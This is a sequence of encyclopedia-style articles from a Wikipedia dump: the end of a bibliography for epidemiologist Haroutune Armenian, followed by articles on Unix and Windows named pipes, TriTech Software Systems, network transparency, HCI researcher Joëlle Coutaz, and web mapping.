Armenian HK, Lilienfeld DE. Applications of the case-control method. Overview and Historical Perspective. Epidemiology Reviews 16(1):1-5;1994.
Dwyer DM, Strickler H, Goodman RA, Armenian HK. Use of Case-Control Studies in Outbreak Investigations. Epidemiology Reviews 16(1):109-123;1994.
Armenian HK, Gordis L. Future Perspectives on the Case-Control Method. Epidemiology Reviews 16(1):163-164;1994.
Armenian HK, Invited Commentary on The Distribution of Incubation Periods of Infectious Disease, American Journal of Epidemiology 141(5):385; March 1, 1995.
Jacobson LP and Armenian HK. Epidemiology of Kaposi's Sarcoma: An Integrated Approach. Current Opinion in Oncology,7:450-455;1995.
Armenian HK, Szklo M. Morton Levin (1904-1995): history in the making. American Journal of Epidemiology. 143(6):648-9.
Armenian HK, Hoover DR, Rubb S, Metz S, Martinez-Maza O, Chmiel J, Kingsley L, Saah A. Risk Factors for Non-Hodgkin's Lymphomas in Acquired Immunodeficiency Syndrome (AIDS), American Journal of Epidemiology, 143(4):374-9;1996.
Pratt LA, Ford DE, Crum R, Armenian HK, Gallo JJ, Eaton WW. Depression, Psychotropic Medication and Risk of Myocardial Infarction. Circulation 94(12):3123-3129, December 15, 1996.
Eaton WW, Armenian HK, Gallo JJ, Pratt L & Ford DE. Depression and Risk for Onset of Type II Diabetes: A prospective population-based study, Diabetes Care, 19(10):1097-1101, 1996.
Armenian HK, From Disasters to Inner City Environment: Psychological Determinants of Physical Illness, Journal of Epidemiology 6(4 Suppl):S49-S52, 1997.
Armenian HK, Melkonian A, Noji EK, Hovanesian AP: Deaths and Injuries due to the Earthquake in Armenia: A Cohort Approach, International Journal of Epidemiology, 26(4):806-13, 1997.
Hisada M, Mueller NE, Welles SL, Okayama A, Armenian HK, Hoover DR, Rubb S, Metza S., Saah A., Chmiel J. Risk factors for non-Hodgkin's lymphomas in acquired immunodeficiency syndrome (AIDS). American Journal of Epidemiology 147(8):681-2.
Harty L, Caporaso N, Hayes R, Winn D, Terry B, Blot W, Kleinman D, Brown L, Armenian HK, Fraumeni J, Shields P. Alcohol Dehydrogenase 3 Genotype and Risk of Oral Cavity and Pharyngeal Cancer, Journal of the National Cancer Institute 89(22):1698-705, 1997.
Vlahov D, Junge B, Brookmeyer R, Cohn S, Riley E, Armenian H, Beilenson P. Reductions in High Risk Drug Use Behaviors Among Participants in the Baltimore Needle Exchange Program, Journal of Acquired Immune Deficiency Syndromes and Human Retrovirology, 16(5):400-406, 1997.
Armenian HK, Pratt, LA, Gallo J, Eaton WW. Psychopathology as a Predictor of Disability: a Population Based Follow-Up Study in Baltimore. American Journal of Epidemiology, 148(3):269-75;1998.
Armenian HK, Melkonian AK, Hovanesian AP. Long Term Mortality and Morbidity Related to Degree of Damage Following the 1988 Earthquake in Armenia, American Journal of Epidemiology, 148(11):1077-1084;1998.
Wang SS, O'Neill JP, Qian GS, Zhu YR, Wang JB, Armenian H, Zarba A, Wang JS Kensler TW, Cariello NF, Groopman JD, Swenberg JA. Elevated HPRT mutation frequencies in aflatoxin-exposed residents of Daxin Qidong County, People's Republic of China. Carcinogenesis, 20(11):979-84; 1999.
Bovasso G, Eaton W, Armenian H. The long-term outcomes of mental health treatment in a population-based study, Journal of Consulting and Clinical Psychology, 67:529-38; 1999.
Schroeder JR, Saah AJ, Hoover DR, Margolick JB, Ambinder RF, Martinez-Maza O, Crabb Breen E, Jacobson LP, Variakojis D, Rowe DT, Armenian HK. Serum Soluble CD23 Level Correlates with Subsequent Development of AIDS-Related Non-Hodgkin's Lymphoma. Cancer Epidemiology Biomarkers and Prevention. November 1999.
Blanchard JF, Armenian HK, Paoulter Friesen P. Risk factors for abdominal aortic aneurysms: a case-control study. American Journal of Epidemiology 151(6): 575–83; 2000.
Blanchard JF, Armenian HK, Peeling R, Poulter Friesen P, Shen C, Burnham RC. The relation between Chlamydia Pneumoniae infection and abdominal aortic aneurysm: A case-control study. Clinical Infectious Disease 2000;30(6):946-47
Jacobson LP, Jenkins FJ, Springer G, Munoz A, Shah KV, Phair J, Zhang ZF and Armenian H. Interaction of HIV-1 and HHV-8 Infections and the Incidence of Kaposi's Sarcoma. Journal of Infectious Diseases 2000; 181:1940-9.
Gallo JJ, Armenian HK, Ford DE, Eaton WW, Khachatruian AS. Major Depression and cancer: the 13 year follow-up of the Baltimore Epidemiologic Catchment Area sample (United States). Cancer Causes and Control 11:751-58, 2000.
Armenian HK, Masahiro M, Melkonian AK, Hovanesian AP, Haroutunian N, Saigh PA, Akiskal K, Akiskal HS. Loss as a determinant of PTSD in a cohort of adult survivors of the 1988 earthquake in Armenia; implications for policy. Acta Psychiatrica Scandinavica 2000:102(1):58-64.
Swartz KL, Pratt LA, Armenian HK, Lee LC, Eaton WW. Mental Disorders and the Incidence of Migraine Headaches in the Community Sample: Results from the Baltimore ECA Follow-up Study. Archives in General Psychiatry, October 2000.
Sibai AM, Fletcher A, Armenian HK. Variations in the Impact of Long-term Wartime Stressors on Mortality among Middle-aged and Older Populations in Beirut, 1983–93. American Journal of Epidemiology 154(2):128-137;2001.
Gregory, PC; Gallo, JJ; Armenian, H. Occupational physical activity and the development of impaired mobility - The 12-year follow-up of the Baltimore epidemiologic catchment area sample. American Journal of Physical Medicine and Rehabilitation, 80(4)270-75 April 2001.
Hsing AW, Chang L, Nomura AM, Isaacs WB, Armenian HK. A glimpse into the future. Epidemiology Review 2001; 23(1):2.
Bogner HR, Sammel MD, Ford DE, Armenian HK, Eaton WW. Urinary Incontinence and Psychological Distress Among Community-Dwelling Older Adults. Journal of the American Geriatric Society 50:1-7, 2002.
Armenian HK, Morikawa M, Melkonian AK, Hovanesian A, Akiskal K, Akiskal HS. Risk Factors for Depression in the Survivors of the 1988 Earthquake in Armenia. Journal of Urban Health: Bull of the New York Academy of Medicine, 79(3): 373–82, September 2002.
Babayan ZV, McNamara RL, Nagajothi N, Kasper EK, Armenian HK, Powe NR, Baughman, KL. Lima JAC. Predictors of Cause-Specific Hospital Readmissions in Patients with Congestive Heart Failure. Clinical Cardiology, 26, 411–418, 2003.
Bernstein KT, Jacobson LP, Jenkins FJ, Vlahov D, Armenian HK. Factors associated with human herpesvirus type 8 infection in an injecting drug user cohort. Sexually Transmitted Diseases. 2003 March; 30 (3): 199–204.
Meyer CM, Armenian HK, Eaton WW, Ford DE. Incident hypertension associated with depression in the Baltimore Epidemiologic Catchment area follow-up study. Journal of Affective Disorders. 2004 December; 83(2-3):127-133.
Schneider MF, Gange SJ, Margolick JB, Detels R, Chmiel JS, Rinaldo C, Armenian HK. Application of Case-Crossover and Case-time-control study designs in analyses of time-varying predictors of T-cell homeostasis failure. Annals of Epidemiology 15(2):137-144; February 2005.
Lucas KE, Armenian HK, Debusk K, Calkins HG, Rowe PC. Characterizing Gulf War Illnesses: Neurally mediated hypotension and postural tachycardia syndrome. American Journal of Medicine. 118, 1421-27:2005.
Mehio-Sibai A, Feinleib M, Sibai TA and Armenian HK. A positive or a negative confounding variable? A simple teaching aid for clinicians and students. Annals of Epidemiology 15 (6):421-3: July 2005.
Srapyan Z, Armenian HK, Petrosyan V. Health-related quality of life and depression among older people in Yerevan, Armenia: a comparative survey of retirement home and household residents aged 65 years old and over. Age and Ageing, Advance Access, vol 35(2): 190–193, published Oxford University Press on behalf of the British Geriatrics Society: January 2006.
Lucas KE, Armenian HK, Petersen GM, Rowe PC. Familial aggregation of fainting in a case-control study of neurally mediated hypotension patients who present with unexplained chronic fatigue. Europace 2006 October; 8(10): 846–851. Epub 2006 Aug 18.
Sahakyan A, Armenian H, Breitscheidel L., Thompson M, Yenokyan G. Feeding practices of babies and the development of atopic dermatitis in children after 12 months of age in Armenia: is there a signal?" European Journal of Epidemiology, 2006; 21(9): 723–725. Epub 2007 April 5.
Armenian, HA, Armenian Medical Roots, Public Health: An Armenian Perspective. Armenian Medical Review, pp. 22–25. (September, 2006).
Lucas KE, Rowe PC, Armenian HK. Latency and exposure-health associations in Gulf War veterans with early fatigue onsets: a case-control study. Annals of Epidemiology. 2007 Oct;17(10):799-806. Epub 2007 Jul 26.
Mussolino ME, Armenian HK. Low bone mineral density, coronary heart disease, and stroke mortality in men and women: the Third National Health and Nutrition Examination Survey. Annals of Epidemiology. 2007 Nov;17(11):841-6. Epub 2007 Aug 28.
Shiels MS, Cole SR, Wegner S, Armenian H, Chmiel JS, Ganesan A, Marconi VC, Martinez-Maza O, Martinson J, Weintrob A, Jacobson LP, Crum-Cianflone NF. Effect of HAART on incident cancer and noncancer AIDS events among male HIV seroconverters. Journal of Acquire Immune Deficiency Syndrom. 2008 Aug 1;48(4):485-90.
Armenian, HK. Quality Assurance Parallels in Health Care Evaluation and Educational Assessment: The American University of Armenia Experience. Education for Health Journal, Epub. July 2009.
Armenian, HK. Epidemiology: a problem-solving journey. American Journal of Epidemiology. 2009 Jan 15; 169 (2): 127–31. Epub 2008 Nov 12.
Sevoyan MK, Sarkisian TF, Belaryan AA, Shahsuvaryan GR, Armenian HK. Prevention of Amyloidosis in Familial Mediterranean Fever with Colchicine. A Case-Control Study in Armenia. Medical Principles and Practice 115, 2009
Armenian HK, Khatib R. Developing an Instrument of Measuring Human Dignity and Its Relationship to Health in Palestinian Refugees. World Medical & Health Policy, Vol. 2: Iss. 2, Article 3, 2010.
Petrosyan D, Armenian HK. Interaction of maternal age and mode of delivery in the development of postpartum depression in Yerevan, Armenia. Journal of Affective Disorders, Vol. 135, Issues 1–3, Pages 77–81, December 2011
Yenokyan G, Armenian HK. Triggers for Attacks in Familial Mediterranean Fever: application of the Case-Crossover Design. American Journal of Epidemiology. American Journal of Epidemiology, volume 175, issue 10, 2012
Khachadourian V, Armenian HK, Demirchyan A, Goenjian A. Loss and Psycho-social Factors as Determinants of Quality of Life in a Cohort of Earthquake Survivors. Health and Quality of Life Outcomes. Health and Quality of Life Outcomes. 2015, Feb 13:13.
Anahit Demirchyan, Vahe Khachadourian, Haroutune K Armenian, Varduhi Petrosyan. Short and Long Term Determinants of Incident Multimorbidity in a Cohort of 1988 Earthquake Survivors in Armenia. International Journal for Equity in Health. August 20, 2013.
Harutyunyan A, Armenian H and Petrosyan V. Interbirth interval and history of previous preeclampsia: a case–control study among multiparous women. BMC Pregnancy and Childbirth. December 27, 2013
Demirchyan A, Petrosyan, D, Armenian, HK. Rate and predictors of postpartum depression in a 22-year follow-up of a cohort of earthquake survivors in Armenia. Archives of Women's Mental Health. 2014 Jun 17(3): 229-37
Demirchyan A, Petrosyan V, Armenian HK, Khachadourian V. Prospective study of predictors of poor self-rated health in a 23-year cohort of earthquake survivors in Armenia. Journal of Epidemiology and Global Health. 2015, Feb. doi:10.1016/j.jegh.2014.12.006
Khachadourian V, Armenian HK, Demirchyan A, Melkonian A, Hovanesian A. Post Earthquake Psychopathological Investigation in Armenia: research methodology, summary of previous findings and recent follow-up. Disasters. Europe PMC. 16 Nov 2015, 40(3):518-533.DOI: 10.1111/disa.12166 PMID 26578424
Book reviews, letters to the editor and other
Sunlight and Breast Cancer Incidence in the USSR. International Journal of Epidemiology 20(4);1145-1146, 1991.
Lives at Risk: Public Health in the Nineteenth-Century Egypt by LaVerne Kuhnke, University of California Press, Berkeley, 1990,243pp. Egypt's Other Wars: Epidemics and the Politics of Public Health by Nancy Elizabeth Gallagher, Syracuse University Press, Syracuse, New York 1990, 256pp. American Journal of Epidemiology 136(6):761-762, 1992.
Manual of Epidemiology for District Health Management Edited by J.P. Vaughan and R.H. Morrow, World Health Organization, Geneva, 1989, 198pp. American Journal of Epidemiology 133(9):956-957, 1992.
History of Epidemiology: Proceedings of the 13th International Symposium on the Comparative History of Medicine—East and West Edited by K. Yosio, S. Shizu
O. Yasuo, Ishiyaku EuroAmerica, Inc. Tokyo, Japan, 1993, 224pp. American Journal of Epidemiology 139(1), 1994:110-111.
The Cambridge World History of Human Disease Edited by K.F. Kiple, Cambridge University Press, Cambridge England, 1993, 1176pp.
The Public Health Consequences of Disasters by Eric Noji(ed), Oxford University Press, American Journal of Epidemiology 146(2):205-206, 1997.
Risk Factors for Non-Hodgkin's Lymphomas in Acquired Immunodeficiency Syndrome (AIDS), American Journal of Epidemiology 146(8):681-682, 1997.
Sibai, AM; Armenian, HK. Long-term psychological stress and heart disease. Int J Epidemiol, 29(5):948-948 October 2000.
Archie Cochrane: Back to the Front by F Xavier Bosch and R Molas (eds), published privately, Barcelona, Spain, 2003, pp. 234. American Journal of Epidemiology 2005;162:917-918.
Psychological distress among adolescents in Chengdu, Sichuan at one month after the 5.12.2008 earthquake – by professor Joseph TF Lau. Journal of Urban Health.
Thesis for the Degree of Doctor of Public Health
Armenian HK: The Relationship of Benign Prostatic Hyperplasia to Cancer of the Prostate. An Epidemiological Study. Johns Hopkins University, School of Hygiene and Public Health, Baltimore, Maryland, 1974.
References
External links
“Itineraries in Life” An Art Show Featuring Artwork from Dr. Haroutune Armenian
Interview Dr. Haroutune Armenian
Յ. Արմէնեան Աւելի Բարձր Նուաճումներու Տեսլականով
Expressions of Beauty in Wartime and Beyond
1942 births
Living people
People from Beirut
American educational theorists
American people of Armenian descent
Heads of universities and colleges in the United States
Lebanese people of Armenian descent
Lebanese emigrants to the United States
American University of Beirut alumni
Johns Hopkins University alumni
UCLA School of Public Health faculty
|
714167
|
https://en.wikipedia.org/wiki/Named%20pipe
|
Named pipe
|
In computing, a named pipe (also known as a FIFO for its behavior) is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of inter-process communication (IPC). The concept is also found in OS/2 and Microsoft Windows, although the semantics differ substantially. A traditional pipe is "unnamed" and lasts only as long as the process. A named pipe, however, can last as long as the system is up, beyond the life of the process. It can be deleted if no longer used. Usually a named pipe appears as a file, and generally processes attach to it for IPC.
In Unix
Instead of a conventional, unnamed, shell pipeline, a named pipeline makes use of the filesystem. It is explicitly created using mkfifo() or mknod(), and two separate processes can access the pipe by name — one process can open it as a reader, and the other as a writer.
For example, one can create a pipe and set up gzip to compress things piped to it:
mkfifo my_pipe
gzip -9 -c < my_pipe > out.gz &
In a separate process shell, independently, one could send the data to be compressed:
cat file > my_pipe
The named pipe can be deleted just like any file:
rm my_pipe
A named pipe can be used to transfer information from one application to another without the use of an intermediate temporary file. For example, you can pipe the output of gzip into a named pipe like so:
mkfifo -m 0666 /tmp/namedPipe
gzip -d < file.gz > /tmp/namedPipe
Then load the uncompressed data into a MySQL table like so:
LOAD DATA INFILE '/tmp/namedPipe' INTO TABLE tableName;
Without this named pipe one would need to write out the entire uncompressed version of file.gz before loading it into MySQL. Writing the temporary file is both time consuming and results in more I/O and less free space on the hard drive.
PostgreSQL's command line utility, psql, also supports loading data from named pipes.
In Windows
A named pipe can be accessed much like a file. Win32 SDK functions CreateFile, ReadFile, WriteFile and CloseHandle open, read from, write to, and close a pipe, respectively. Unlike Unix, there is no command line interface, except for PowerShell.
Named pipes cannot be created as files within a normal filesystem, unlike in Unix. Also unlike their Unix counterparts, named pipes are volatile (removed after the last reference to them is closed). Every pipe is placed in the root directory of the named pipe filesystem (NPFS), mounted under the special path \\.\pipe\ (that is, a pipe named "foo" would have a full path name of \\.\pipe\foo). Anonymous pipes used in pipelining are actually named pipes with a random name.
They are very rarely seen by users, but there are notable exceptions. The VMware Workstation PC hardware virtualization tool, for instance, can expose emulated serial ports to the host system as named pipes, and the WinDbg kernel mode debugger from Microsoft supports named pipes as a transport for debugging sessions (in fact, VMware and WinDbg can be coupled together – as WinDbg normally requires a serial connection to the target computer – letting driver developers do their development and testing on a single computer). Both programs require the user to enter names in the \\.\pipe\name form.
Windows NT named pipes can inherit a security context.
Summary of named pipes on Microsoft Windows:
Intermachine and intramachine IPC
Half-duplex or full-duplex
Byte-oriented or packet-oriented
Reliable
Connection-oriented communication
Blocking or Nonblocking read and write (choosable)
Standard device I/O handles (ReadFile, WriteFile)
Namespace used to create handles
Inefficient WAN traffic (explicit data transfer request, unlike e.g. TCP/IP sliding window, etc.)
Peekable reads (read without removing from pipe's input buffer)
The .NET Framework 3.5 has added named pipe support.
Named pipes can also be used as an endpoint in Microsoft SQL Server.
Named pipes are also a networking protocol in the Server Message Block (SMB) suite, based on the use of a special inter-process communication (IPC) share. SMB's IPC can seamlessly and transparently pass the authentication context of the user across to Named Pipes. Windows NT's entire NT Domain protocol suite of services are implemented as DCE/RPC service over Named Pipes, as are the Exchange 5.5 Administrative applications.
See also
Anonymous pipe
Anonymous named pipe
Unix file types
References
External links
Linux Interprocess Communications: Named Pipes (Linux Documentation Project, 1996)
Introduction to Named Pipes (Linux Journal, 1997)
Inter-process communication
|
33802433
|
https://en.wikipedia.org/wiki/TriTech%20Software%20Systems
|
TriTech Software Systems
|
TriTech Software Systems, formerly known as American Tritech, is a public safety software company based in San Diego, California, with offices in San Ramon, California; Hillsboro, Oregon; Decorah, Iowa; Castle Hayne, North Carolina; Melville, New York; Marlborough, Massachusetts; and Montreal, Quebec, Canada.
History
TriTech was founded in 1991 in San Diego, California by Christopher D. Maloney. Chris interned at San Diego emergency transport company where he saw the need for a more efficient dispatch paradigm. TriTech’s first products were for the emergency transport market and was originally named American TriTech but was renamed in 1998 to TriTech Software Systems, as the company's business was not limited to the United States. In 2018, TriTech merged with three other public sector software companies to form CentralSquare Technologies.
Products
TriTech supports five distinct product lines. TriTech is considered to a key player in security control room market. In 2020, Chicago announced Computer Aided Dispatch, Mobile and Analytics software by TriTech for its 9-1-1 Center.
See also
Computer-aided dispatch
Emergency medical services
References
Companies based in San Diego
Software companies based in California
Law enforcement equipment
Software companies of the United States
|
1786529
|
https://en.wikipedia.org/wiki/Network%20transparency
|
Network transparency
|
Network transparency, in its most general sense, refers to the ability of a protocol to transmit data over the network in a manner which is transparent (invisible) to those using the applications that are using the protocol. In this way, users of a particular application may access remote resources in the same manner in which they would access their own local resources. An example of this is cloud storage, where remote files are presented as being locally accessible, and cloud computing where the resource in question is processing.
X Window
The term is often partially correctly applied in the context of the X Window System, which is able to transmit graphical data over the network and integrate it seamlessly with applications running and displaying locally; however, certain extensions of the X Window System are not capable of working over the network.
Databases
In a centralized database system, the only available resource that needs to be shielded from the user is the data (that is, the storage system). In a distributed DBMS, a second resource needs to be managed in much the same manner: the network. Preferably, the user should be protected from the network operational details. Then there would be no difference between database applications that would run on the centralized database and those that would run on a distributed one. This kind of transparency is referred to as network transparency or distribution transparency. From a database management system (DBMS) perspective, distribution transparency requires that users do not have to specify where data is located.
Some have separated distribution transparency into location transparency and naming transparency.
Location transparency in commands used to perform a task is independent both of locations of the data, and of the system on which an operation is carried out.
Naming transparency means that a unique name is provided for each object in the database.
Firewalls
Transparency in firewall technology can be defined at the networking (IP or Internet layer) or at the application layer.
Transparency at the IP layer means the client targets the real IP address of the server. If a connection is non-transparent, then the client targets an intermediate host (address), which could be a proxy or a caching server. IP layer transparency could be also defined from the point of server's view. If the connection is transparent, the server sees the real client IP. If it is non-transparent, the server sees the IP of the intermediate host.
Transparency at the application layer means the client application uses the protocol in a different way. An example of a transparent HTTP request for a server:
GET / HTTP/1.1
Host: example.org
Connection: Keep-Alive
An example non-transparent HTTP request for a proxy (cache):
GET http://foo.bar/ HTTP/1.1
Proxy-Connection: Keep-Alive
Application layer transparency is symmetric when the same working mode is used on both the sides. The transparency is asymmetric when the firewall (usually a proxy) converts server type requests to proxy type or vice versa.
Transparency at the IP layer does not automatically mean application layer transparency.
See also
Data independence
Replication transparency
References
Telecommunications
Data management
|
57023129
|
https://en.wikipedia.org/wiki/Jo%C3%ABlle%20Coutaz
|
Joëlle Coutaz
|
Joëlle Coutaz is a French computer scientist, specializing in human-computer interaction (HCI). Her career includes research in the fields of operating systems and HCI, as well as being a professor at the University of Grenoble. Coutaz is considered a pioneer in HCI in France, and in 2007, she was awarded membership to SIGCHI. She was also involved in organizing CHI conferences and was a member on the editorial board of ACM Transactions on Computer-Human Interaction. She has authored over 130 publications, including two books, in the domain of human-computer interaction.
Career
In 1970, Coutaz received her PhD in computer science from Joseph Fourier University in Grenoble, France, where she specialized in operating systems. She then worked as a software engineer for French National Center for Scientific Research (CNRS). In 1972, she worked on the first packet switching network at the University of Grenoble, and later became an assistant professor for the university until 1991. She was a visiting scientist at Carnegie Mellon University from 1983 to 1984.
Coutaz's research interests shifted from operating systems to human-computer interaction after attending a CHI conference in 1983. She would then become a pioneer in HCI in France, by bridging the domain with software engineering. In 1988, she obtained her Thèse d'Etat in human-computer interaction from Joseph Fourier University. Then in 1991, she became a full professor at University of Grenoble.
In 1990, Coutaz founded and directed CLIPS, an HCI group at the Laboratory of Informatics in Grenoble. She co-founded two groups part of the CNRS national programme on computer-supported cooperative work and multimodal HCI. Furthermore, she became the co-chief editor of the Journal of Interaction between Persons and Systems. Between 1989 and 1995, she contributed to the AMODEUS project by ESPRIT BRA/LTR, whose purpose was to promote a multidisciplinary approach to human-computer interaction. In 2008, Coutaz coordinated a group working on ambient intelligence for the Ministry of Higher Education, Research, and Innovation, with the purpose of confronting societal challenges in novel ways. The group took on the creation of a field that intersects information and communication technologies, and social and human sciences.
As of 2012, she is professor emeritus from the University of Grenoble.
Research
After achieving her PhD in 1970, Coutaz pursued her research interests in operating systems and computer networks. However, her research interests shifted to human-computer interaction in 1983 after attending a CHI conference. In this newer domain, her work focused on software architecture modeling for interactive systems, multimodal interaction, augmented reality, and user interface plasticity. In 1987, she created the presentation-abstraction-control (PAC) model, a software architecture model for interactive systems. In 1993, Coutaz began to work with Laurence Nigay to combine the PAC model with ARCH, a model designed for the implementation of multimodal user interfaces. She has also contributed to projects on a European and national level. Coutaz is currently working on end-user software engineering for smart homes in the field of ubiquitous computing.
FAME
From 2001 to 2004, Coutaz contributed to FAME at Karlsruhe Institute of Technology. The goal of the project was to create an intelligent agent which could facilitate communication between people of different cultures when solving a common problem. Their solution made use of multimodal interactions, including vision, speech, and object manipulation to create and manipulate new information based on the context.
CAMELEON
CAMELEON's purpose was to build methods and environments which support the design and development of context-dependent interfaces. They focused on methods which would promote the creation of software interfaces that are usable on various devices.
CONTINUUM
Between 2008 and 2011, Coutaz contributed to CONTINUUM. The project addressed the problem of service continuity within the long-term vision of ambient intelligence, and defined models that support service continuity for mobile users. Three key scientific issues were addressed: context management and awareness, semantic heterogeneity, and human control versus system autonomy.
UsiXML (ITEA)
From 2009 to 2012, Coutaz contributed to UsiXML by Information Technology for European Advancement (ITEA 2). UsiXML is a markup language for user interfaces, in which UI can be designed at different levels of abstraction.
AppsGate
Between 2012 and 2015, Coutaz contributed to AppsGate. Their goal was to create software that would allow non-engineers to create their own programs for their environment. With the rise of IoT, their focus was on programmable smart home devices.
Publications
Books
Bass, L. J., & Coutaz, J. (1991). Developing software for the user interface. SEI Series in Software Engineering, Addison-Wesley, pp. I-XIV, 1–255.
Coutaz, J. (1990). Interfaces homme-ordinateur: Conception et réalisation. Dunod informatique.
Selected publications
Coutaz, J., & Calvary, G. (2012). Human-Computer Interaction and Software Engineering for User Interface Plasticity. In Jacko, J. A. (Eds.), Human computer interaction handbook: Fundamentals, evolving technologies, and emerging applications (pp. 1195–1214). Boca Raton, FL: CRC Press.
Coutaz, J., Crowley, J. L., Dobson, S., & Garlan, D. (2005). Context is key. Communications of the ACM, 48(3), p. 49-53.
Calvary, G., Coutaz, J., Thevenin, D., Limbourg, Q., Bouillon, L., & Vanderdonckt, J. (2003). A unifying reference framework for multi-target user interfaces. Interacting with computers, 15(3), p. 289-308.
Thevenin, D., & Coutaz J. (1999). Plasticity of User Interfaces: Framework and Research Agenda. Interact, 99, p. 110-117.
Nigay, L., & Coutaz, J. (Eds.). (1993). Proceedings of the INTERACT'93 and CHI'93 conference on human factors in computing systems: A design space for multimodal systems: concurrent processing and data fusion. New York City, NY: ACM.
Awards
In 2013, Coutaz was awarded the National Order of the Legion of Honour, the highest French order for military and civil merits.
In 2013, she received the IFIP TC13 Pioneer Award for outstanding contributions to the educational, theoretical, technical, commercial, or professional aspects of analysis, design, construction, evaluation and use of interactive systems.
In 2013, she became an honorary member of Société Informatique de France.
In 2007, she received an Honorary Degree of Doctor of Science from the University of Glasgow.
In 2007, she was awarded membership to SIGCHI for substantial contributions to the field of Human-Computer Interaction.
References
French computer scientists
French women computer scientists
Year of birth missing (living people)
Living people
Grenoble Alpes University faculty
Human–computer interaction researchers
Chevaliers of the Légion d'honneur
|
8561200
|
https://en.wikipedia.org/wiki/Web%20mapping
|
Web mapping
|
A Web mapping or an online mapping is the process of using the maps delivered by geographic information systems (GIS) on the Internet, more specifically in the World Wide Web (WWW). A web map or an online map is both served and consumed, thus web mapping is more than just web cartography, it is a service by which consumers may choose what the map will show. Web GIS emphasizes geodata processing aspects more involved with design aspects such as data acquisition and server software architecture such as data storage and algorithms, than it does the end-user reports themselves.
The terms web GIS and web mapping remain somewhat synonymous. Web GIS uses web maps, and end users who are web mapping are gaining analytical capabilities. The term location-based services refers to web mapping consumer goods and services. Web mapping usually involves a web browser or other user agent capable of client-server interactions. Questions of quality, usability, social benefits, and legal constraints are driving its evolution.
The advent of web mapping can be regarded as a major new trend in cartography. Until recently cartography was restricted to a few companies, institutes and mapping agencies, requiring relatively expensive and complex hardware and software as well as skilled cartographers and geomatics engineers.
Web mapping has brought many geographical datasets, including free ones generated by OpenStreetMap and proprietary datasets owned by HERE, Huawei, Google, Tencent, TomTom, and others. A range of free software to generate maps has also been conceived and implemented alongside proprietary tools like ArcGIS. As a result, the barrier to entry for serving maps on the web has been lowered.
Types
A first classification of web maps has been made by Kraak in 2001. He distinguished static and dynamic web maps and further distinguished interactive and view only web maps. Today there an increased number of dynamic web maps types, and static web map sources.
Analytical web maps
Analytical web maps offer GIS analysis. The geodata can be a static provision, or needs updates. The borderline between analytical web maps and web GIS is fuzzy. Parts of the analysis can be carried out by the GIS geodata server. As web clients gain capabilities processing is distributed.
Animated and realtime
Realtime maps show the situation of a phenomenon in close to realtime (only a few seconds or minutes delay). They are usually animated. Data is collected by sensors and the maps are generated or updated at regular intervals or on demand.
Animated maps show changes in the map over time by animating one of the graphical or temporal variables. Technologies enabling client-side display of animated web maps include scalable vector graphics (SVG), Adobe Flash, Java, QuickTime, and others. Web maps with real-time animation include weather maps, traffic congestion maps and vehicle monitoring systems.
CartoDB launched an open source library, Torque, which enables the creation of dynamic animated maps with millions of records. Twitter uses this technology to create maps to reflect how users reacted to news and events worldwide.
Collaborative web maps
Collaborative maps are a developing potential. In proprietary or open source collaborative software, users collaborate to create and improve the web mapping experience. Some collaborative web mapping projects are:
Google Map Maker
Here Map Creator
OpenStreetMap
WikiMapia
meta:Maps - a survey of Wikimedia movement web mapping proposals
Online atlases
The traditional atlas goes through a remarkably large transition when hosted on the web. Atlases can cease their printed editions or offer printing on demand. Some atlases also offer raw data downloads of the underlying geospatial data sources.
Static web maps
Static web pages are view only without animation or interactivity. These files are created once, often manually, and infrequently updated. Typical graphics formats for static web maps are PNG, JPEG, GIF, or TIFF (e.g., drg) for raster files, SVG, PDF or SWF for vector files. These include scanned paper maps not designed as screen maps. Paper maps have a much higher resolution and information density than typical computer displays of the same physical size, and might be unreadable when displayed on screens at the wrong resolution.
Web GIS in the cloud
Various companies now offer web mapping as a cloud based software as a service. These service providers allow users to create and share maps by uploading data to their servers (cloud storage). The maps are created either by using an in browser editor or writing scripts that leverage the service providers API's.
Evolving paper cartography
Compared to traditional techniques, mapping software has many advantages. The disadvantages are also stated.
Web maps can easily deliver up to date information. If maps are generated automatically from databases, they can display information in almost realtime. They don't need to be printed, mastered and distributed. Examples:
A map displaying election results, as soon as the election results become available.
A traffic congestion map using traffic data collected by sensor networks.
A map showing the current locations of mass transit vehicles such as buses or trains, allowing patrons to minimize their waiting time at stops or stations, or be aware of delays in service.
Weather maps, such as NEXRAD.
Software and hardware infrastructure for web maps is cheap. Web server hardware is cheaply available and many open source tools exist for producing web maps. Geodata, on the other hand, is not; satellites and fleets of automobiles use expensive equipment to collect the information on an ongoing basis. Perhaps owing to this, many people are still reluctant to publish geodata, especially in places where geodata are expensive. They fear copyright infringements by other people using their data without proper requests for permission.
Product updates can easily be distributed. Because web maps distribute both logic and data with each request or loading, product updates can happen every time the web user reloads the application. In traditional cartography, when dealing with printed maps or interactive maps distributed on offline media (CD, DVD, etc.), a map update takes serious efforts, triggering a reprint or remastering as well as a redistribution of the media. With web maps, data and product updates are easier, cheaper, and faster, and occur more often. Perhaps owing to this, many web maps are of poor quality, both in symbolization, content and data accuracy.
Web maps can combine distributed data sources. Using open standards and documented APIs one can integrate (mash up) different data sources, if the projection system, map scale and data quality match. The use of centralized data sources removes the burden for individual organizations to maintain copies of the same data sets. The downside is that one has to rely on and trust the external data sources. In addition, with detailed information available and the combination of distributed data sources, it is possible to find out and combine a lot of private and personal information of individual persons. Properties and estates of individuals are now accessible through high resolution aerial and satellite images throughout the world to anyone.
Web maps allow for personalization. By using user profiles, personal filters and personal styling and symbolization, users can configure and design their own maps, if the web mapping systems supports personalization. Accessibility issues can be treated in the same way. If users can store their favourite colors and patterns they can avoid color combinations they can't easily distinguish (e.g. due to color blindness). Despite this, as with paper, web maps have the problem of limited screen space, but more so. This is in particular a problem for mobile web maps; the equipment carried usually has a very small screen, making it less likely that there is room for personalisation.
Web maps enable collaborative mapping similar to web mapping technologies such as DHTML/Ajax, SVG, Java, Adobe Flash, etc. enable distributed data acquisition and collaborative efforts. Examples for such projects are the OpenStreetMap project or the Google Earth community. As with other open projects, quality assurance is very important, however, and the reliability of the internet and web server infrastructure is not yet good enough. Especially if a web map relies on external, distributed data sources, the original author often cannot guarantee the availability of the information.
